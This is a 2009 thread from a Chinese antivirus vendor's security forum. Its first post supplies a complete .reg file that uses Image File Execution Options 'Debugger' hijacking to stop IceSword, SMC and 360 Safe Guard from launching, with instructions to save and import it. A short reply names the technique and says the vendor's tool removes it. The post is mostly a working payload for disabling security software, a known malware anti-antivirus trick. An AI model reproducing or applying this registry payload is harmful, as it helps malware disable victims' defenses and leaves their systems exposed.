Killav网上使用REG的另一方法【附代码】 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 可疑文件交流 Killav网上使用REG的另一方法【附代码】

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

Killav网上使用REG的另一方法【附代码】

本主题由版主 mopery 于 2010-2-10 9:23:18 执行关闭主题/取消操作

程序漏洞初生襁褓狮帖子:24 注册: 2009-08-09 来自:飘渺时空	发表于： 2009-08-09 16:09 \| 只看楼主短消息资料字号：小中大 1楼 Killav网上使用REG的另一方法【附代码】 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.EXE] Debugger="SVCHOST.EXE" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMC.EXE] Debugger="SVCHOST.EXE" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe] Debugger="SVCHOST.EXE" 把上面的代码另存为.reg文件导入后将导致冰轫，SMC,360安全卫士无法再次运行！这就是典型的映像劫持应用用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)*
程序漏洞初生襁褓狮帖子:24 注册: 2009-08-09 来自:飘渺时空	分享到：

sinoer 横据古稀狮帖子:12382 注册: 2008-09-23 来自:	发表于： 2009-08-09 17:13 \| 短消息资料字号：小中大 2楼回复：Killav网上使用REG的另一方法【附代码】这个玩意学名叫应用程序劫持项，直接用卡卡就可以over掉
sinoer 横据古稀狮帖子:12382 注册: 2008-09-23 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT